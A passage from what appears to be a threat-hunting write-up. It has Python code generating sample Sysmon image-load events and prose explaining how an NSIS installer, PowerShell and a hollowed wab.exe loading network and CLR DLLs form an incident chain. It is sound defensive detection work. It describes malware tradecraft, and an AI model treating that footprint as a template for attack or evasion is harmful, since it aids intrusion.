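        (r"C:\Users\user\Desktop\Payment_Advice.exe",
         ["apphelp.dll", "version.dll", "uxtheme.dll", "riched20.dll"]),
        (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         ["mscoree.dll", "vcruntime140_clr0400.dll", "ucrtbase_clr0400.dll", "amsi.dll"]),
        (r"C:\Program Files (x86)\Windows Mail\wab.exe",
         ["wininet.dll", "winhttp.dll", "schannel.dll", "mscoree.dll",
          "vcruntime140_clr0400.dll", "ucrtbase_clr0400.dll"]),
    ]
    return [{"Image": image, "ImageLoaded": "C:\\Windows\\SysWOW64\\" + dll}
            for image, dlls in rows for dll in dlls]


if __name__ == "__main__":
    for image, result in analyze_image_loads(sample_events()).items():
        print(image)
        for reason in result["findings"]:
            print("  -", reason)
```

powershell.exe loading the same CLR modules is expected and stays silent; it is the parent-child chain (NSIS installer to PowerShell to a hollowed wab.exe) that turns the per-process finding into an incident. Note also that powershell.exe loaded amsi.dll, so whatever script it ran was presented to AMSI and the AMSI provider's verdict is worth pulling from the same host.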